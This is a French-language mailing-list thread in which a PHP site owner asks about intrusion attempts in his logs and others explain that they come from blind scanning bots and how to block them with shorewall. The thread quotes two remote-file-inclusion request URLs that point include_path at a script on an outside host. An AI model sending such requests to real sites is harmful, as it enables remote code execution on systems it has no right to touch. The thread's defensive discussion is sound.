Le 02/04/08, Nicolas Boulay<[EMAIL PROTECTED]> a écrit :
> En gros tu blacklists l'ip pendant quelques heures ?
oui en utilisant shorewall drop adresse_ip
 mais vu que ce sont souvent les memes adresses ip qui reviennent je
les blacklist definitivement en fait ( jusqu'au prochain reboot du
firewall ou du serveur , ce qaui peut facilement faire 6 mois de drop
;)

>
>  Le 02/04/08, neofutur<[EMAIL PROTECTED]> a écrit :
>
> >  oui, ce sont des robots de recherche de failles, des requetes de ce
>  >  genre j'en ai des milliers chaque jour sur mes serveurs, au point que
>  >  generalement il y a plus de charge en provenance des robotsd qu'en
>  >  provenance des visiteurs reels.
>  >
>  >   En general ces robots testent des failles connues pour un cms (
>  >  joomla, phpbb . .. . ) mais en aveugle, ils cherchent la faille sur
>  >  tous les sites du web sans chercher a savoir si le site web possede le
>  >  logiciel concerne par la faille.
>  >   D'une maniere generale tu ne risque rien.si ton site web n'utilise
>  >  pas le logiciel concerne par la faille recherchée, le seul vrai risque
>  >  est pour l'hebergeur de ton site qui, s'il heberge des dizaines de
>  >  sites web sur un meme serveur, risque d'etre surcharge par des
>  >  dizaines de requetes de ce genre a la minute.
>  >   Sur certains de mes serveurs j'ai du en arriver a creer des
>  >  expressions regulieres qui detectent dce genre de requetres bidon pour
>  >  ensuite dropper reguilierement les adresses ips utilisees par ces
>  >  robots, sans quoi ils generent tellement de charge sur le serveur que
>  >  les sites peuvent etre injoignables  pour les vrais utilisateurs.
>  >
>  >  Le 02/04/08, Yann Cochard<[EMAIL PROTECTED]> a écrit :
>  >
>  > > Bonjour,
>  >  >
>  >  >  Sur mon site en PHP, je repère des tentatives d'intrusion / prise de
>  >  >  contrôle / récupération de données sensibles. Elles n'ont pas l'air
>  >  >  efficaces (c'est pour ça que j'en ai connaissance d'ailleurs : j'ai un
>  >  >  log d'erreur), et se font par massage de paramètres.
>  >  >  Exemple :
>  >  >  
> http://monsite/config_settings.php?config[include_path]=http://www.health-nutrition-business.com/echo.txt?
>  >  >  ou même :
>  >  >  
> http://monsite/mapage.html/config_settings.php?config[include_path]=http://www.health-nutrition-business.com/echo.txt?
>  >  >  Comme je n'ai pas de page config_settings.php et que mes pages ne
>  >  >  prennent pas les paramètres de cette manière, ça ne marche pas... o_O
>  >  >  Pour voir le contenu du script que l'attaquant essaie de faire
>  >  >  tourner, voyez ce fichier texte :
>  >  >  http://www.health-nutrition-business.com/echo.txt
>  >  >
>  >  >  La question que je me pose : ces attaques sont-elles conçus pour des
>  >  >  programmes PHP connus (par exemple phpBB), ou bien peuvent-elles
>  >  >  fonctionner sur du code maison ?
>  >  >  Comment s'en prémunir ?
>  >  >
>  >  >  Merci
>  >  >  Yann
>  >  >
>  >  > --
>  >  >  _________________________________________________________________
>  >  >  Kaella, distribution Linux live-cd : http://kaella.linux-azur.org
>  >  >
>  >  >  Diffusez cette liste aupres de vos relations :)
>  >  >      Linux Azur : http://linux-azur.org
>  >  >  L'auteur du post est responsable de ses écrits !
>  >  >  *** Pas de message SMS, HTML ni de PJ SVP ***
>  >  >
>  >
>  >
>  >
>  > --
>  >  Cordialement
>  >
>  >   William Waisse
>  >   http://waisse.org | http://neoskills.com
>  >    http://cahierspip.ww7.be | http://feeder.ww7.be
>  >
>  >  carte de visite : http://xena.ww7.be/my_carte2.jpg
>  >
>  >
>  >  Diffusez cette liste aupres de vos relations :)
>  >      Linux Azur : http://linux-azur.org
>  >  L'auteur du post est responsable de ses écrits !
>  >  *** Pas de message SMS, HTML ni de PJ SVP ***
>  >
>
>  Diffusez cette liste aupres de vos relations :)
>      Linux Azur : http://linux-azur.org
>  L'auteur du post est responsable de ses écrits !
>  *** Pas de message SMS, HTML ni de PJ SVP ***
>


-- 
Cordialement

 William Waisse
  http://waisse.org | http://neoskills.com
   http://cahierspip.ww7.be | http://feeder.ww7.be

carte de visite : http://xena.ww7.be/my_carte2.jpg

Diffusez cette liste aupres de vos relations :)
     Linux Azur : http://linux-azur.org
L'auteur du post est responsable de ses �crits !
*** Pas de message SMS, HTML ni de PJ SVP ***

Répondre à